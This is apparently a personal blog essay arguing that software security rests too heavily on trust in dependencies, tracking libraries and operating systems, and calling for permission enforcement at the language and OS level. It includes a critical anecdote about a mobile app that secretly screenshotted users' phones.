The bad state of application security: trust
--
Ever since I started working with NodeJS and NPM, the feeling of speed, convenience and easiness related to project dependencies was shadowed by the question we all got to embrace: if it’s so easy to install dependencies, when will this become a liability? Wouldn’t this turn the project into a mess of dependencies? This would be a development challenge especially when you want to unplug a dependency or switch to another, but ultimately won’t this be a security liability?
The same is with Rust and Cargo: you need WebDAV capabilities in your project? There’s a library for that. You need calendar capabilities? Just install a library. Each library depending of course on another set of libraries, and so on. This is great for developers because they get to stop reimplementing what has already been done, and it’s great because they get to use libraries without hassle. A simple command takes care of the whole setup. If you don’t appreciate this model, try to code something in C or C++ for a week. You will beg for package and dependency managers.
But if speed and convenience were handled with an application, security remained the developer’s concern. The fact that almost all libraries are open source are a pat on the back to mitigate the security anxiety. You can check the code, it’s all good. Nobody would write anything malicious. Everybody is using this library! But in reality nobody checks the code of every project dependency, and the fact that everybody is using a certain library doesn’t mean that anyone does.
Snyk and NPM audit came as a sort of hasted rescue operation, but these tools are superficial. They try to match documented vulnerabilities with existing open source code, and usually suggesting an upgrade to a fixed version of the same library, which is not always possible. Also, sometimes the malicious intent cannot be discovered simply by making this match. Sometimes code that is perfectly valid and non malicious, can be turned to do something bad without a single notice. And of course, the biggest issue is these security tools need documented vulnerabilities. If nobody scans for a particular trait, or if the malicious trait is undocumented, it gets lost in the mix of thousands of lines of code.
So you audit your code…
But we only talked so far only about vulnerabilities and code audits. There is another class of security breaching applications: tracking and advertising libraries. The first ones harm your privacy, the second ones harm the integrity of the application you are using by injecting random code that comes with the ads. Of course there may be different checks put in place to limit the harm these applications may do, but in the end the application developers care about the application, not about the ads. The ads are an afterthought, usually dealt with by employing yet another library. Who checks the code for this library? Does anyone even care about it?
The worst case of tracking was at a previous company I worked for where they showcased in a meeting the latest tracking capabilities for their mobile app. The tracking library would downright screenshot the phone from time to time when the application was in use, and would send the unedited screenshot to the company. The presenter was asked in passing about the privacy and legality of this behavior, but he brushed everything off with the usual “everybody does it”. If everybody does it, it must be legal. In reality, they didn’t care about the legality of the situation. They cared about measuring the user’s behavior and trying to correct anything that didn’t generate more clicks, more interaction, more money.
We can see that even with all the code audits in place, even with apps that trigger alerts when code is found to be sneaky, the ultimate security dictator that we have today is woefully inadequate: trust. I trust you give me a well behaved library. I trust that by using your application I am not spied on. I trust that by giving you the rights to my documents folder, you won’t upload everything I have there to your server.
Scanning for malicious behavior is tough
But it goes deeper because the problem is not just with project libraries and dependencies. You launch an application on your secure and private Linux machine: can you be sure of its behavior? Even if the application is fully safe and the developer is vetted and he is a well respected member of the open source community: are you fully certain that an honest mistake in his code cannot produce a bug that can be exploited by somebody else to do unknown harm? Again, you trust that it doesn't. But let’s go further.
How often do you monitor your network connections to your network? How often do you monitor speed alterations in your network traffic? Would you associate them with malicious applications doing covert operations in your network? Would you be able to find the processes that cause the speed delays? Windows and MacOS allow you to pin network traffic to the apps that cause them with their simple, default, graphical process management tools. For Linux you have to know what to install and how to use it. Do you do this on a regular basis?
No. The answer is no because you trust the operating system, the software and all of their dependencies to do exactly what they say they do and nothing more. If a small library that nobody thinks about starts sending your documents to an unknown destination, the most probable course of action will be complete ignorance: you won’t even know what happens. And I am not even going to add that almost all the software development teams I worked with so far would simply ignore the Snyk audit reports. Nobody cares because they all want that feature released and that bug fixed. We trust the library developers for the rest.
Denying trust
The only way to mitigate this trust, or to move security from a place of trust to a place of enforcement is by adjusting the framework in which you write your software, and the operating system you run it on. If we want to stop relying on “security audits” that go nowhere, or give false positives, or give nothing at all because they cannot possibly connect our “well-written” code to a complete and total malicious disaster, we have to enforce security at the programming language level and at the operating system level.
This again is not new. Browsers these days have a very high bar when it comes to security. Think about the permission request to use the camera or the microphone. Think about the volume notification for each browser tab when it plays sounds. Thinks about the permission request to download a file in a home directory, the permission request to display notifications, the full transparency of each network connection that you can see with the browser’s developer tools. All of that means that the browser is not taking the application code for granted: it notifies the user about anything, any resources used by the code.
Kind of the same thing happens at the operating system level with certain resources. Mobile applications have to request rights for everything these days. Same for Linux when using SELinux and Flatpak applications: they have a fixed set of rights and cannot do anything outside of them. This means security is enforced, not trusted. Next we have the modern programming platforms like .NET which performs hundreds of checks to make sure that the code is not able to access memory that’s unrelated to the application. This is the only way to make security real, and not a joke between tired and overworked developers.
But even so, with all the checks in place, tracking applications like the one I mentioned was shown to me are still possible today. That’s because usually programming languages check for memory misuse, and operating systems are really old and base their security model on a system admin driven network, a system admin that usually sets everything up nice and safe for everybody. But unfortunately things have changed. End users are now the main device and application consumers and the system admin is becoming a relic in all startups. Browsers are a bit ahead, but not by much and again, their novel security solutions are limited to the obvious resources: files, cameras and microphones. Nobody checks for key-loggers, malicious and covert uploads, weird code injections coming from ads or hidden bitcoin miners.
If we want application security, we should discard trust. We need to rely on the programming language that it won’t allow the developer do things that are not explicitly described, and we need to rely on the operating system that it will at least report all used resources and all network traffic, the same way a browser does today. That’s the bare minimum.
Unfortunately, today we have neither. Programming languages are helping developers write code faster, with fewer bugs, and fewer memory leaks, but they don’t ask what the program does. It could be a perfectly written, bug free and exceptionally performant key logger. The programming language couldn't care less. And the operating system reports network traffic only when asked, or only after installing arcane tools that are hard to follow.
I hope the future will bring better tools and renewed interest for operating system and development platform security. Maybe in a future article we will dwell more on these subjects and we will discuss security trends and improvements which could make the end user’s life easier. Thanks for reading and see you next time!